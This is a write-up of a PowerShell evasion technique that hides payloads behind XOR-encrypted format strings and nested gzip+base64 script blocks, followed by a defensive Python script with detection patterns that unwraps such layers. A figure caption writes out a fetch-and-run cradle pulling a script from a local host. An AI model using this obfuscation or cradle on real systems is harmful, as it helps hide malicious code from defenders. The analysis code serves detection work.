# PowerShell Script Block Obfuscation

### Background

This method was developed to hide a payload behind several gzipped, base64 encoded script blocks and XOR-encrypted format strings, while setting as few variables as possible so that someone cannot simply run the script in PowerShell ISE and read the payload out of the variable assignments. The obfuscated script blocks can be run with arguments and piped to each other.

### Analysis

The first stage of the obfuscation defines an XOR key and saves each character of the input text XORed with the key, so that the string can be rebuilt later. Before the string is reassembled, both arrays are shuffled in the same order and saved. A format string is then built that references the XOR key array and the encrypted value needed to rebuild each character.

<figure><img src="/files/EnDSgV7ktEXM0NlN0kEa" alt=""><figcaption><p>Example first stage obfuscation</p></figcaption></figure>

After the obfuscated string is created, the script gzips and base64 encodes the first-stage payload and appends the PowerShell commands that decompress and decode it from the command line. For a simple string or a command with no arguments, the obfuscation can stop here to save space in the final payload.

<figure><img src="/files/oVbYIEWM4spQt07UcC7c" alt=""><figcaption><p>Second stage obfuscation</p></figcaption></figure>

For commands with arguments, the script parses the command's flags and arguments, appending the flags unchanged and obfuscating the arguments. Lastly, the script takes the built string and compresses and encodes it again, producing a single gzipped, base64 encoded payload.

<figure><img src="/files/Vyuwuc3QVp2Fx0XXOYNx" alt=""><figcaption><p><em>irm -uri 127.0.0.1/test.ps1 | iex</em></p></figcaption></figure>

<figure><img src="/files/Am510LecWkF4e6faiNlM" alt=""><figcaption><p>Reverse shell example</p></figcaption></figure>
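From the analyst's side, the layering described above unwinds mechanically: each stage is a long base64 run that decodes to gzip data, and each recovered layer carries the tokens of the next stage (the decompression stub, then the format-string and `-bxor` rebuild). The following Python is an added example, not code from the write-up or its author: it peels gzip+base64 layers out of a script block and records which indicator tokens appear at each depth. The sample it runs on is constructed in the block itself (a benign inner script wrapped twice behind a placeholder stub that carries only the tokens the scanner keys on); the indicator list is illustrative rather than exhaustive.

```python
import base64
import gzip
import re

# Token patterns worth recording at each layer: the decompression stub
# (base64 decode + GzipStream + iex) and the first-stage rebuild
# (format operator + -bxor). Illustrative list, not exhaustive.
INDICATORS = {
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "gzip_stream": re.compile(r"GzipStream", re.I),
    "invoke_expression": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "format_operator": re.compile(r"\{\d+\}.*?\s-f\s", re.I | re.S),
    "xor_operator": re.compile(r"-bxor\b", re.I),
}

# A base64 run long enough to be a payload rather than an ordinary identifier.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
GZIP_MAGIC = b"\x1f\x8b"


def find_indicators(text):
    """Return the sorted names of indicator patterns present in a script block."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def peel_layer(text):
    """Return the decompressed script behind the first base64 run that decodes
    to gzip data, or None when no such run exists (the innermost layer)."""
    for match in B64_RUN.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if not raw.startswith(GZIP_MAGIC):
            continue
        try:
            return gzip.decompress(raw).decode("utf-8", errors="replace")
        except (OSError, EOFError):  # magic matched but not a valid gzip member
            continue
    return None


def unwrap(text, max_layers=10):
    """Peel gzip+base64 layers until plain script remains. Returns a list of
    (script_text, indicators) tuples, outermost first. max_layers bounds the
    loop so a malformed or self-referential sample cannot spin forever."""
    layers = [(text, find_indicators(text))]
    current = text
    for _ in range(max_layers):
        inner = peel_layer(current)
        if inner is None:
            break
        layers.append((inner, find_indicators(inner)))
        current = inner
    return layers


# --- Constructed sample (not from the write-up): a benign inner script wrapped twice ---
INNER_SCRIPT = "$c = 0x48 -bxor 0x00; Write-Output ('{0}{1}' -f [char]$c, 'ello')"


def wrap_once(script):
    """Constructed stand-in for a decompression stub: it carries only the tokens
    the scanner keys on; the real stub's stream plumbing is replaced by a placeholder."""
    blob = base64.b64encode(gzip.compress(script.encode())).decode()
    return f"iex ([GzipStream placeholder] [Convert]::FromBase64String('{blob}'))"


SAMPLE = wrap_once(wrap_once(INNER_SCRIPT))


if __name__ == "__main__":
    for depth, (script, found) in enumerate(unwrap(SAMPLE)):
        print(f"layer {depth}: indicators={found}")
        print(f"  {script[:80]}{'...' if len(script) > 80 else ''}")
```

Running it on the constructed sample yields three layers: the two outer ones show only the stub indicators (`base64_decode`, `gzip_stream`, `invoke_expression`) and the innermost shows `format_operator` and `xor_operator`, which is the signature of the first-stage rebuild described above. Bounding the loop with `max_layers` matters in practice, since a sample that re-embeds itself would otherwise keep an analysis pipeline busy indefinitely.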
